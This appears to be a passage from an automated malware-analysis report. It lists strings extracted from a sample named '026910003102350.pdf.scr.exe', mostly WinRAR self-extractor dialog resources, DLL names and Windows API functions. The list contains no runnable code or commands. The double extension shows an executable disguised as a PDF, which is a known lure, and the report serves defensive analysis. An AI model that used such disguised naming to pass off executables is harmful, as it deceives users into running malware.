      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1a
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title4
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_arcbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilesto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrfilestotemp
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractbutton
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extractprogress
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_maxpathlimit
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unkencmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongpassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_wrongfilepassword
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_copyerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnks
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreatelnkh
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errlnktarget
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_needadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_pause
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_continue
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secwarning
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_secdeldll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_destedittitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_changedir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idc_progressbartitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $startdlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrfileexists
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owraskreplace
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrquestion
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owryes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrrename
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrno
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrnoall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $replacefiledlg:idc_owrcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renamefrom
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $renamedlg:idc_renameto
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idc_passwordenter
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $getpassword1:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $licensedlg:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:size
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:caption
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolfind
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idc_nextvolinfo2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idok
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $asknextvol:idcancel
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: user32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: gdi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comdlg32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: advapi32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ppngriched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldll$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfxstaticreplacefiledlgrenamedlg%s %s %s%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fole32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: acquiresrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasesrwlockexclusive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: shlwapi.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: comctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusiveshlwapi.dllcomctl32.dll
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad array new length@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <5ikq
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __based(
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __cdecl
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __pascal
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __stdcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __thiscall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __fastcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __vectorcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __clrcall
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __eabi
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_1
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_2
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __swift_3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __ptr64
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __restrict
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: __unaligned
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: restrict(
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: delete
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: operator
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vftable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vbtable'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `vcall'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: `typeof'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$r
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$rs
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .bss0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5@
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01pf
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow'
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitem
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enablewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextwd
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getparent
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextw~
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsystemmetrics
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclientrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowlongw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setprocessdefaultlayout
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadstringw"
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: oemtocharbuffa<charupperw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: defwindowprocwm
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: registerclassexwncreatewindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroywindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpoints
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpointsucopyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw|
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdce
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: messageboxw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: findwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyimage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewtcopyimage5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: translatemessage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew&
